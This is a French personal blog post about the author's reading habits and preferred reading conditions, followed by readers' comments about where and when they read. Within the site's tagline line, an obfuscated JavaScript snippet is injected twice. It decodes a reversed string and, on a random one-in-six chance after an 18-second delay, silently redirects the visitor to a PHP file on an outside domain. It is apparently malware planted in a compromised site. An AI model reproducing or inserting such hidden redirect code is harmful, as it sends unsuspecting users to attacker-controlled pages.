Ma vie de lectrice

Mes exigences de lectrice

J’ai besoin de calme pour lire, je suis incapable de me concentrer s’il y a du bruit. J’aime aussi savoir que j’ai du temps devant moi pour lire, je suis incapable de lire 5 minutes par ci 5 minutes par là.

J’aime lire allongée dans mon lit à la lumière naturelle. Si j’essaye de lire le soir dans mon lit, mes yeux fatiguent vite et je m’endors directement à moins que je plongée dans un livre vraiment passionnant.

Je n’aime pas lire assise (peut-être parce que je n’ai pas de fauteuil vraiment confortable).

Et je suis incapable de lire dans le métro ou dans les transports (encore moins en voiture, ça me rend malade).

Toutes ces conditions expliquent pourquoi je ne parviens plus à lire correctement ces derniers temps. Parce que je n’ai plus le temps de me mettre au lit une après midi avec plusieurs heures de lecture devant moi (et parfois une petite sieste au milieu).

Quelques endroits dans cet article me donnent envie, tout particulièrement  celui-ci

laurenconrad.com

ou celui-ci

planete-deco.fr

Et vous ?

 

Ici et là, des livres, des mots sur $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tout et rien. Et des livres, encore et $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toujours.

20 Comments

  • George

    Je crois que je suis capable de lire un peu partout, sauf quand il y a trop de bruit quand même, mais mon lieu de prédilection reste mon lit, malheureusement le soir difficile de tourner plus de 3 pages sans sombrer dans le sommeil et cela même si j’essaie de me coucher tôt. Je ne prends pas de transports en commun, ce qui en soit est agréable, vive la voiture, pourvoir rentrer chez soi après le boulot sans avoir à attendre le RER ou autre bus et métro, mais du coup pas le temps de lire. Je pourrais lire en salle des profs pendant les trous de mon emploi du temps mais j’ai toujours trente-six mille à faire : déposer les documents à la repro, peaufiner un cours, corriger des petites interro, parler avec les collègues, etc. Je lis donc le matin grâce à ma bonne vieille habitude de déjeuner au lit, pour cela je me réveille une petite heure avant tout le monde, mais j’avoue qu’en fin de semaine, c’est plus difficile et je me rendors souvent. Me reste les mercredis, les samedis et les dimanches matins où là je profite davantage, mais je suis vite rattrapée par tout ce que je dois faire. Le tout est de lire, finalement, même si c’est moins qu’avant. Tes photos donnent envie, notamment la première que j’aime beaucoup !

    • Carles

      Tout comme George et toi, j’adore lire dans mon lit. Mais le soir, il s’avère assez complexe de ne pas sombrer rapidement dans le sommeil. La journée, j’ai peu de temps pour lire. Comme George, en salle des profs, il est assez difficile de prendre le temps de lire : nous avons toujours des choses à faire.
      Et les fins de semaine, ce n’est pas facile non plus. Par exemple, ce week-end, je suis plongé dans les lectures dédiées à mes recherches universitaires. Et après une journée de recherches, la tête est pleine et il est complexe de se plonger dans la lecture.
      Mais le principal c’est bien de lire, quand on peut et toujours avec le même plaisir.

    • delphinesbooks

      Ca te laisse tout de même un peu plus de temps qu’à moi pour lire :)

  • Marjolaine

    Je préfère lire au calme mais j’aime bien lire dans le métro, je suis ainsi dans ma bulle loin des gens et des énervements des transports. J’aime pas lire au lit, j’ai jamais trouvé la position confortable pour mes bras. Je préfère lire, lovée dans un fauteuil ou dans un canapé.
    J’aime lire dans le train.
    En voiture, ce n’est possible que sur l’autoroute car sinon j’ai mal au coeur.
    D’ailleurs à propos de lecture, je file au club des lectrices!
    Dans le lien que tu as mis en illustration j’aime bien l’oeuf nacelle pour lire ou la maison dans le jardin!

    • delphinesbooks

      Quelle chance de pouvoir lire presque partout

  • Stéphanie

    j’adore la deuxième photo, une liseuse face à la mer, j’adore.

    Moi je peux lire partout, mais j’aime surtout lire dans mon canapé, car dans ma chambre il n’y a pas de chauffage et du coup il fait froid, donc quand je monte je dors. Je n’arrive pas à passer du temps dans mon lit pour lire. Mais je le fait dans le canapé près du radiateur avec ma couette quand même lol.

  • Rock and Tea

    Moi c’est l’inverse :)
    Dès que j’ai un moment de libre, je lis. Il y a du bruit autour, ça passe ou ça casse, ça dépend de quelle nuisance il s’agit.

  • Madame

    Je lis assise en voiture, dans les transports, partout, même si je préfère lire seule et au calme cela me permet de continuer de lire…

    • delphinesbooks

      J’aimerais bien pouvoir faire comme toi

  • Frankie

    Moi, c’est tout le contraire ! :) Je lis partout, même dans le bruit (j’arrive à ne plus l’entendre, à condition qu’il ne soit pas assourdissant), même 5 minutes, mais surtout le soir avant de dormir (c’est là où j’ai le plus de temps pour me poser. J’aime lire dans la voiture, ça ne me rend pas malade, j’ai même lu dans le désert alors que ça secouait de partout ! :D
    La 2e photo de ton article me plaît beaucoup, je m’y verrais bien lire.

    • delphinesbooks

      Quelle chance de pouvoir lire partout !

  • Laeti

    Je profite de chaque minute de libre pour lire, même pour 5 minutes (mais ce n’est pas ce que je préfère), bien souvent dans mon canapé (jamais couchée, sinon, je ne lis qu’une phrase!). Le matin, avant d’aller chercher le loulou si je suis prête à l’avance, et le soir quelques minutes sacrées dans mon lit avant de sombrer… pas évident de lire de façon aussi hachée. Mais de ce que je lis, c’est pareil pour la plupart d’entre nous!

  • Nelly

    Comme Laeti, je profite de chaque minute que je peux grappiller par ci par là. Pour moi, la lecture, c’est une drogue, et si je ne lis pas assez je suis de mauvais poil. Je peux lire partout, même dans le bruit, mais j’adapte mes lectures : une BD ou un roman jeunesse sur le canapé avec les enfants qui regardent la télé, un roman facile à lire si je suis fatiguée, des lectures plus complexes, des essais, le soir au lit ou le matin tôt, au calme. Du coup j’ai toujours plusieurs livres en cours, mais jamais dans le même genre pour éviter de me faire des noeuds dans les intrigues.

  • Laisser un commentaire

    Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *